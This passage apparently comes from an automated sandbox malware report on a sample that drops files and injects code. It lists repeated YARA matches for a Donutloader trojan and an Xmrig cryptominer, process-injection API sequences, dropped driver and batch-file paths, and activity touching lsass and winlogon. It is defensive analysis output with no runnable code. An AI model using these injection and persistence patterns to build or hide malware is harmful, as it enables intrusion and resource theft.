        Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000014.00000002.1397583794.00000113DAF00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000001E.00000002.1535066654.0000021E7B340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 00000018.00000002.1422444536.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
        Source: 0000001B.00000002.1427320159.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
        Source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_00401D58 NtAllocateVirtualMemory,10_2_00401D58
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_00401D18 NtWriteVirtualMemory,10_2_00401D18
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_004019D8 NtCreateThreadEx,10_2_004019D8
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_00401D98 NtProtectVirtualMemory,10_2_00401D98
        Source: C:\Users\user\AppData\Local\Temp\paint.exeCode function: 10_2_00401C98 NtClose,10_2_00401C98
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_00401D58 NtAllocateVirtualMemory,31_2_00401D58
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_00401D18 NtWriteVirtualMemory,31_2_00401D18
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_004019D8 NtCreateThreadEx,31_2_004019D8
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_00401D98 NtProtectVirtualMemory,31_2_00401D98
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 31_2_00401C98 NtClose,31_2_00401C98
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,94_2_0000000140001868
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,95_2_0000000140001868
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,97_2_0000000140001868
        Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_3fc24ylm.ndk.ps1
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C14305401_2_00007FF7C1430540
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C1430B401_2_00007FF7C1430B40
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C14305081_2_00007FF7C1430508
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C143089D1_2_00007FF7C143089D
        Source: C:\Users\user\Desktop\e7WMhx18XN.exeCode function: 1_2_00007FF7C14305001_2_00007FF7C1430500
        Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000025EE91B23F018_3_0000025EE91B23F0
        Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000025EE91BCC9418_3_0000025EE91BCC94
        Source: C:\Windows\System32\cmd.exeCode function: 18_3_0000025EE91BCE1818_3_0000025EE91BCE18
        Source: C:\Windows\System32\conhost.exeCode function: 19_3_000001AD31C9CC9419_3_000001AD31C9CC94
        Source: C:\Windows\System32\conhost.exeCode function: 19_3_000001AD31C923F019_3_000001AD31C923F0
        Source: C:\Windows\System32\conhost.exeCode function: 19_3_000001AD31C9CE1819_3_000001AD31C9CE18
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11E10620_2_00000113DB11E106
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11E4D620_2_00000113DB11E4D6
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11E90E20_2_00000113DB11E90E
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11D4D220_2_00000113DB11D4D2
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00000113DB11ED6A20_2_00000113DB11ED6A
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00007FF7C14D50F620_2_00007FF7C14D50F6
        Source: C:\Windows\System32\conhost.exeCode function: 20_2_00007FF7C14D5EA220_2_00007FF7C14D5EA2
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55E4D630_2_0000021E7B55E4D6
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55E10630_2_0000021E7B55E106
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55ED6A30_2_0000021E7B55ED6A
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55D4D230_2_0000021E7B55D4D2
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_0000021E7B55E90E30_2_0000021E7B55E90E
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_00007FF7C14E50F630_2_00007FF7C14E50F6
        Source: C:\Windows\System32\conhost.exeCode function: 30_2_00007FF7C14E5EA230_2_00007FF7C14E5EA2
        Source: C:\Windows\System32\conhost.exeCode function: 36_3_00000236C6DCCE1836_3_00000236C6DCCE18
        Source: C:\Windows\System32\conhost.exeCode function: 36_3_00000236C6DC23F036_3_00000236C6DC23F0
        Source: C:\Windows\System32\conhost.exeCode function: 36_3_00000236C6DCCC9436_3_00000236C6DCCC94
        Source: C:\Windows\System32\cmd.exeCode function: 44_3_0000015829E723F044_3_0000015829E723F0
        Source: C:\Windows\System32\cmd.exeCode function: 44_3_0000015829E7CE1844_3_0000015829E7CE18
        Source: C:\Windows\System32\cmd.exeCode function: 44_3_0000015829E7CC9444_3_0000015829E7CC94
        Source: C:\Windows\System32\conhost.exeCode function: 45_3_000001D643A6CE1845_3_000001D643A6CE18
        Source: C:\Windows\System32\conhost.exeCode function: 45_3_000001D643A6CC9445_3_000001D643A6CC94
        Source: C:\Windows\System32\conhost.exeCode function: 45_3_000001D643A623F045_3_000001D643A623F0
        Source: C:\Windows\System32\conhost.exeCode function: 58_3_000002063182CE1858_3_000002063182CE18
        Source: C:\Windows\System32\conhost.exeCode function: 58_3_000002063182CC9458_3_000002063182CC94
        Source: C:\Windows\System32\conhost.exeCode function: 58_3_00000206318223F058_3_00000206318223F0
        Source: C:\Windows\System32\conhost.exeCode function: 69_3_000001CCE36423F069_3_000001CCE36423F0
        Source: C:\Windows\System32\conhost.exeCode function: 69_3_000001CCE364CE1869_3_000001CCE364CE18
        Source: C:\Windows\System32\conhost.exeCode function: 69_3_000001CCE364CC9469_3_000001CCE364CC94
        Source: C:\Windows\System32\conhost.exeCode function: 70_3_000001858EA1CC9470_3_000001858EA1CC94
        Source: C:\Windows\System32\conhost.exeCode function: 70_3_000001858EA123F070_3_000001858EA123F0
        Source: C:\Windows\System32\conhost.exeCode function: 70_3_000001858EA1CE1870_3_000001858EA1CE18
        Source: C:\Windows\System32\conhost.exeCode function: 73_3_000002942EBECE1873_3_000002942EBECE18
        Source: C:\Windows\System32\conhost.exeCode function: 73_3_000002942EBE23F073_3_000002942EBE23F0
        Source: C:\Windows\System32\conhost.exeCode function: 73_3_000002942EBECC9473_3_000002942EBECC94
        Source: C:\Windows\System32\conhost.exeCode function: 83_3_000001C8A038CE1883_3_000001C8A038CE18
        Source: C:\Windows\System32\conhost.exeCode function: 83_3_000001C8A03823F083_3_000001C8A03823F0
        Source: C:\Windows\System32\conhost.exeCode function: 83_3_000001C8A038CC9483_3_000001C8A038CC94
        Source: C:\Windows\System32\conhost.exeCode function: 87_3_000001E5EF03CC9487_3_000001E5EF03CC94
        Source: C:\Windows\System32\conhost.exeCode function: 87_3_000001E5EF0323F087_3_000001E5EF0323F0
        Source: C:\Windows\System32\conhost.exeCode function: 87_3_000001E5EF03CE1887_3_000001E5EF03CE18
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140001CF094_2_0000000140001CF0
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_0000000140002D4C94_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_000000014000127494_2_0000000140001274
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_000000014000243494_2_0000000140002434
        Source: C:\Windows\System32\dllhost.exeCode function: 94_2_000000014000320494_2_0000000140003204
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_0000000140001CF095_2_0000000140001CF0
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_0000000140002D4C95_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_000000014000127495_2_0000000140001274
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_000000014000243495_2_0000000140002434
        Source: C:\Windows\System32\dllhost.exeCode function: 95_2_000000014000320495_2_0000000140003204
        Source: C:\Windows\System32\dllhost.exeCode function: 96_3_000002ADD62323F096_3_000002ADD62323F0
        Source: C:\Windows\System32\dllhost.exeCode function: 96_3_000002ADD623CC9496_3_000002ADD623CC94
        Source: C:\Windows\System32\dllhost.exeCode function: 96_3_000002ADD623CE1896_3_000002ADD623CE18
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_0000000140001CF097_2_0000000140001CF0
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_0000000140002D4C97_2_0000000140002D4C
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_000000014000127497_2_0000000140001274
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_000000014000243497_2_0000000140002434
        Source: C:\Windows\System32\dllhost.exeCode function: 97_2_000000014000320497_2_0000000140003204
        Source: C:\Windows\System32\conhost.exeCode function: 99_3_0000021C0EE5CE1899_3_0000021C0EE5CE18
        Source: C:\Windows\System32\conhost.exeCode function: 99_3_0000021C0EE5CC9499_3_0000021C0EE5CC94
        Source: C:\Windows\System32\conhost.exeCode function: 99_3_0000021C0EE523F099_3_0000021C0EE523F0
        Source: C:\Windows\System32\winlogon.exeCode function: 101_3_000001FC603823F0101_3_000001FC603823F0
        Source: C:\Windows\System32\winlogon.exeCode function: 101_3_000001FC6038CC94101_3_000001FC6038CC94
        Source: C:\Windows\System32\winlogon.exeCode function: 101_3_000001FC6038CE18101_3_000001FC6038CE18
        Source: C:\Windows\System32\lsass.exeCode function: 103_3_00000161C734CC94103_3_00000161C734CC94
        Source: C:\Windows\System32\lsass.exeCode function: 103_3_00000161C73423F0103_3_00000161C73423F0
        Source: C:\Windows\System32\lsass.exeCode function: 103_3_00000161C734CE18103_3_00000161C734CE18
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
        Source: e7WMhx18XN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2684
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
        Source: unknownProcess created: Commandline size = 5434
        Source: unknownProcess created: Commandline size = 5297
        Source: unknownProcess created: Commandline size = 5277
        Source: unknownProcess created: Commandline size = 5288
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2684
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
        Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000001F.00000002.1478641969.0000000000905000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
        Source: 0000000A.00000002.1356435328.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
        Source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
